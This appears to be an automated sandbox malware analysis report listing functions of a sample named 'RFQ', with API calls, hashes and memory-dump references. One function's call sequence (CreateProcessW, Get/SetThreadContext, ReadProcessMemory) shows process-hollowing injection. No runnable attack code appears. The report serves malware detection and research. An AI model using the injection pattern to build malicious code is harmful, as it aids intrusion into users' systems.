                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 3677997916-824357125
                                                                            • Opcode ID: dc6fa97ccd0aa397b0a09ae92208407972b137899b0fec1bd83ff00c1a5af8ee
                                                                            • Instruction ID: a8f2ceb6cd6230c36d5b4823f33f7db60eb1c14a905eeb90618681db1516b657
                                                                            • Opcode Fuzzy Hash: dc6fa97ccd0aa397b0a09ae92208407972b137899b0fec1bd83ff00c1a5af8ee
                                                                            • Instruction Fuzzy Hash: 2F115A75520608FFDB259FA8DCC59EEBBB9EF04740B108659E802E7210E2319E419B60
                                                                            Function 01716378 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 836 1716378-1716418 call 1718838 * 3 843 171641a-1716424 836->843 844 171642f 836->844 843->844 845 1716426-171642d 843->845 846 1716436-171643f 844->846 845->846 847 1716446-1716af8 846->847 848 1716b0b-1716b38 CreateProcessW 847->848 849 1716afa-1716afe 847->849 855 1716b42 848->855 856 1716b3a-1716b3d 848->856 850 1716b00-1716b04 849->850 851 1716b44-1716b71 849->851 853 1716b06 850->853 854 1716b7d-1716baa 850->854 869 1716b73-1716b76 851->869 870 1716b7b 851->870 858 1716bb4-1716bce Wow64GetThreadContext 853->858 854->858 878 1716bac-1716baf 854->878 855->858 859 1716f39-1716f3b 856->859 860 1716bd0 858->860 861 1716bd5-1716bf0 ReadProcessMemory 858->861 866 1716ee2-1716ee6 860->866 863 1716bf2 861->863 864 1716bf7-1716c00 861->864 863->866 867 1716c02-1716c11 864->867 868 1716c29-1716c48 call 1717eb8 864->868 871 1716f37 866->871 872 1716ee8-1716eec 866->872 867->868 874 1716c13-1716c22 call 1717e08 867->874 887 1716c4a 868->887 888 1716c4f-1716c72 call 1717ff8 868->888 869->859 870->858 871->859 876 1716f01-1716f05 872->876 877 1716eee-1716efa 872->877 874->868 889 1716c24 874->889 879 1716f11-1716f15 876->879 880 1716f07-1716f0a 876->880 877->876 878->858 878->859 884 1716f21-1716f25 879->884 885 1716f17-1716f1a 879->885 880->879 890 1716f32-1716f35 884->890 891 1716f27-1716f2d call 1717e08 884->891 885->884 887->866 895 1716c74-1716c7b 888->895 896 1716cbc-1716cdd call 1717ff8 888->896 889->866 890->859 891->890 897 1716cb7 895->897 898 1716c7d-1716ca7 call 1717ff8 895->898 903 1716ce4-1716d02 call 1718858 896->903 904 1716cdf 896->904 897->866 902 1716cac-1716cae 898->902 905 1716cb0 902->905 906 1716cb5 902->906 909 1716d0d-1716d17 903->909 904->866 905->866 906->896 910 1716d19-1716d4b call 1718858 909->910 911 1716d4d-1716d51 909->911 910->909 913 1716d57-1716d67 911->913 914 1716e3c-1716e59 call 1717a08 911->914 913->914 917 1716d6d-1716d7d 913->917 921 1716e60-1716e7f Wow64SetThreadContext 914->921 922 1716e5b 914->922 917->914 920 1716d83-1716da7 917->920 923 1716daa-1716dae 920->923 924 1716e81 921->924 925 1716e83-1716e8e call 1717d38 921->925 922->866 923->914 926 1716db4-1716dc9 923->926 924->866 932 1716e90 925->932 933 1716e92-1716e96 925->933 928 1716ddd-1716de1 926->928 930 1716de3-1716def 928->930 931 1716e1f-1716e37 928->931 934 1716df1-1716e1b 930->934 935 1716e1d 930->935 931->923 932->866 936 1716ea2-1716ea6 933->936 937 1716e98-1716e9b 933->937 934->935 935->928 939 1716eb2-1716eb6 936->939 940 1716ea8-1716eab 936->940 937->936 941 1716ec2-1716ec6 939->941 942 1716eb8-1716ebb 939->942 940->939 943 1716ed3-1716edc 941->943 944 1716ec8-1716ece call 1717e08 941->944 942->941 943->847 943->866 944->943
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01716B33
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01716BC9
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01716BEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            • Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                                                            • Instruction ID: 0f2bcc1859c4b01bd69837f88bb9e8ff86d08eb1cbaa432f67264e4c4d1abacf
                                                                            • Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                                                            • Instruction Fuzzy Hash: 0562FF30A142589BEB24CFA8C850BDEB776FF58300F1091A9E10DEB394E7759E85CB59
                                                                            Function 00692C10 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __Init_thread_footer.LIBCMT ref: 006930F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID: CALL$Qdn
                                                                            • API String ID: 1385522511-744523239
                                                                            • Opcode ID: 01591afa75d92e340f573f1ca2eeab00d05f3fdbb024f97b9c6be70027d7eb28
                                                                            • Instruction ID: 110cb57db870824c17c17a7a8b2a1e66ff75d9eff92933590243049a838c298e
                                                                            • Opcode Fuzzy Hash: 01591afa75d92e340f573f1ca2eeab00d05f3fdbb024f97b9c6be70027d7eb28
                                                                            • Instruction Fuzzy Hash: 28229C70608342EFCB14DF14C490A6ABBFABF85314F24895DF4868BBA2D771E945CB46
                                                                            Function 006857AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006C40D9
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 0068588F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                            • String ID: Line:
                                                                            • API String ID: 2289894680-1585850449
                                                                            • Opcode ID: 60bfbf194dc293e722f69f8e1d56b176d46112550bc1528d506d1d00cd06b7c4
                                                                            • Instruction ID: a98f92e6e20fe278269836020b0b5fa7a09afeb9fed0267a78f17a814e4a1834
                                                                            • Opcode Fuzzy Hash: 60bfbf194dc293e722f69f8e1d56b176d46112550bc1528d506d1d00cd06b7c4
                                                                            • Instruction Fuzzy Hash: C131E171408310AEC360FB20DC55BEB77D9AB40711F108A2EF59683191DFB49A49CBDA
                                                                            Function 0069FD5B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 006A05E8
                                                                              • Part of subcall function 006A3234: RaiseException.KERNEL32(?,?,?,006A060A,?,00000001,?,?,?,?,?,?,006A060A,?,00748748), ref: 006A3294
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 006A0605
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                            • String ID: Unknown exception
                                                                            • API String ID: 3476068407-410509341
                                                                            • Opcode ID: 26555256e34c8aedf53fd4cf6a0ff73c1c03ef64d43c411857b04c9db94ff2fe
                                                                            • Instruction ID: e8cb809a551ffad876de615f6892bf761272e7da8b1593fa685042b61ade4033
                                                                            • Opcode Fuzzy Hash: 26555256e34c8aedf53fd4cf6a0ff73c1c03ef64d43c411857b04c9db94ff2fe
                                                                            • Instruction Fuzzy Hash: EAF0222090020C778F40BBA8EC46DDEB76E5E02300B604038B824D29A2EF71EF5A8DC5
                                                                            Function 00707E80 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 0070821C
                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00708223
                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00708404
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                            • String ID:
                                                                            • API String ID: 146820519-0
                                                                            • Opcode ID: 84d5856b0d00dd1436bc53e00b6dbab6517d557631cc5e8b5db9375040cc7daa
                                                                            • Instruction ID: 975328ae58fe7e70a464693cabd006e203925d846f755ffb090c6dbc97963b4f
                                                                            • Opcode Fuzzy Hash: 84d5856b0d00dd1436bc53e00b6dbab6517d557631cc5e8b5db9375040cc7daa
                                                                            • Instruction Fuzzy Hash: FE127C71A08341DFC754DF28C484B2ABBE5FF85314F048A5DE8898B392DB75E946CB92
                                                                            Function 006829FE Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006834CE: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006834FF
                                                                              • Part of subcall function 006834CE: MapVirtualKeyW.USER32(00000010,00000000), ref: 00683507
                                                                              • Part of subcall function 006834CE: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00683512
                                                                              • Part of subcall function 006834CE: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0068351D
                                                                              • Part of subcall function 006834CE: MapVirtualKeyW.USER32(00000011,00000000), ref: 00683525
                                                                              • Part of subcall function 006834CE: MapVirtualKeyW.USER32(00000012,00000000), ref: 0068352D
                                                                              • Part of subcall function 00683455: RegisterWindowMessageW.USER32(00000004,?,00682BCF), ref: 006834AD
                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00682C75
                                                                            • OleInitialize.OLE32 ref: 00682C93
                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 006C3037
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                            • String ID:
                                                                            • API String ID: 1986988660-0
                                                                            • Opcode ID: 0c4fa14b2f64e4a3aac09f2199893d16321391e8fcc9a9fd5243876315b6bc52
                                                                            • Instruction ID: 02d9838a7bb222e1f1e52d5c3a86e297a1b2fbe49951a7e0b801aa43bd7c74dc
                                                                            • Opcode Fuzzy Hash: 0c4fa14b2f64e4a3aac09f2199893d16321391e8fcc9a9fd5243876315b6bc52
                                                                            • Instruction Fuzzy Hash: FD71D9B49003408EC785EFA9A8457D53BE1AB883577C0C62E941AC73A1FBBC59A4CF5C
                                                                            Function 006B864E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000,00000000,?,?,006B856C,?,00748CD8,0000000C), ref: 006B86A4
                                                                            • GetLastError.KERNEL32(?,006B856C,?,00748CD8,0000000C), ref: 006B86AE
                                                                            • __dosmaperr.LIBCMT ref: 006B86D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                            • String ID:
                                                                            • API String ID: 2583163307-0
                                                                            • Opcode ID: 662cb88f8c259e63ac7912bd7a5b403a348bc1dfcfab1c09e11fbd2047f3f888
                                                                            • Instruction ID: 850cca9f2688d46ffd067e3ac9b2b250d2e3a4183aef126489da404ddbe11bda
                                                                            • Opcode Fuzzy Hash: 662cb88f8c259e63ac7912bd7a5b403a348bc1dfcfab1c09e11fbd2047f3f888
                                                                            • Instruction Fuzzy Hash: 3A010CB35046501ED2A53374A846BED674F4B92734F29411DF9198B3D2FEA48CC1C395
                                                                            Function 0068480E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 006C386E
                                                                              • Part of subcall function 0068592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00685922,?,?,006848AA,?,?,?,00000000), ref: 0068594D
                                                                              • Part of subcall function 006847D0: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006847EF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                            • String ID: X
                                                                            • API String ID: 779396738-3081909835
                                                                            • Opcode ID: 50be70e11e43daf10d71ab10f8dea6de40447c37fac0d4e5f3a796ded04ab5c9
                                                                            • Instruction ID: 4f276aab42d6bf82f08bdc99f3bb735b486c1f031e08fbc584e069376c020c42
                                                                            • Opcode Fuzzy Hash: 50be70e11e43daf10d71ab10f8dea6de40447c37fac0d4e5f3a796ded04ab5c9
                                                                            • Instruction Fuzzy Hash: DE219671A002989FDF41EF98D805BEE7BFA9F49314F00805DE415A7241DBB89A89CF65
                                                                            Function 006856C2 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00685793
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_
                                                                            • String ID:
                                                                            • API String ID: 1144537725-0
                                                                            • Opcode ID: 38a5dca3cf41b3560040cf9ac54f8e6d30550fa3a118bdfc5fc54794508b14a5
                                                                            • Instruction ID: ec68280d5eaef454a48f9438989f2f8e6a8b874f651a4aff80a4ecea3267e980
                                                                            • Opcode Fuzzy Hash: 38a5dca3cf41b3560040cf9ac54f8e6d30550fa3a118bdfc5fc54794508b14a5
                                                                            • Instruction Fuzzy Hash: 2B318170504701CFD361EF24D8947D7BBF9FB48319F008A2EE59A83240E7B5A944CB5A
                                                                            Function 006870E5 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0068AE0C,?,00008000), ref: 00687113
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0068AE0C,?,00008000), ref: 006C4BFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 516aa1522b942296bdd04836d56f7be39d07797cf154b67ade140803131dee58
                                                                            • Instruction ID: c6ea7bff5dcdcf0092afaf16485e69e1d1cb25c607718cebbfd544fe369dafaa
                                                                            • Opcode Fuzzy Hash: 516aa1522b942296bdd04836d56f7be39d07797cf154b67ade140803131dee58
                                                                            • Instruction Fuzzy Hash: B8019230285225B6E3315A6ACC0EFE77F99EF02774F24C304BA985E1E0CBB49855CB90
                                                                            Function 0068368B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsThemeActive.UXTHEME ref: 006836AD
                                                                              • Part of subcall function 00683656: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 0068366B
                                                                              • Part of subcall function 00683656: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00683682
                                                                              • Part of subcall function 0068445D: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006836D8,?), ref: 0068448D
                                                                              • Part of subcall function 0068445D: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006836D8,?), ref: 006844A0
                                                                              • Part of subcall function 0068445D: GetFullPathNameW.KERNEL32(00007FFF,?,?,00751418,00751400,?,?,?,?,?,?,006836D8,?), ref: 00684515
                                                                              • Part of subcall function 0068445D: SetCurrentDirectoryW.KERNEL32(?,00000001,00751418,?,?,?,?,?,?,?,006836D8,?), ref: 00684596
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 006836E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                            • String ID:
                                                                            • API String ID: 1550534281-0
                                                                            • Opcode ID: ec132d5df82abf311b3603606b7ab032ceb0818bbab7635aca8e886bb077c2d0
                                                                            • Instruction ID: 9e07d436a25d6a9aef681ad88197bd3c02019c3c2c2835d24e96b5182b274031
                                                                            • Opcode Fuzzy Hash: ec132d5df82abf311b3603606b7ab032ceb0818bbab7635aca8e886bb077c2d0
                                                                            • Instruction Fuzzy Hash: 4CF06731544344AFE301ABA8EC2ABA53B96A700B07F40C519F104496E2EBFA94908B4C
                                                                            Function 01716375 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01716B33
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01716BC9
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01716BEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                            • Instruction ID: 9500e9cec9fdec0f7cd07ac8db621c9ac3b9586dc68ff2ed080e964a59d26dc8
                                                                            • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                            • Instruction Fuzzy Hash: A312BC24A24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CB5A
                                                                            Function 0068F058 Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: InputState
                                                                            • String ID:
                                                                            • API String ID: 860304643-0
                                                                            • Opcode ID: 50089e77774bb8b3ed3386f7821277a28028824b4f915f46641f8168d4a8005e
                                                                            • Instruction ID: ef75c69bf8f71e49eec1249cdd79a4024fcc6755ac4fd904f37156456c10a39c
                                                                            • Opcode Fuzzy Hash: 50089e77774bb8b3ed3386f7821277a28028824b4f915f46641f8168d4a8005e
                                                                            • Instruction Fuzzy Hash: 5E51D0719047429FDB39DF14C4547E6BBE2BB55315F04863EE46883361D3B4A994CF82
                                                                            Function 0069FBF0 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction ID: 2c07bd4a91162146daba7fd56ae1f119aa8f3dd98f07f696625648248872fd26
                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
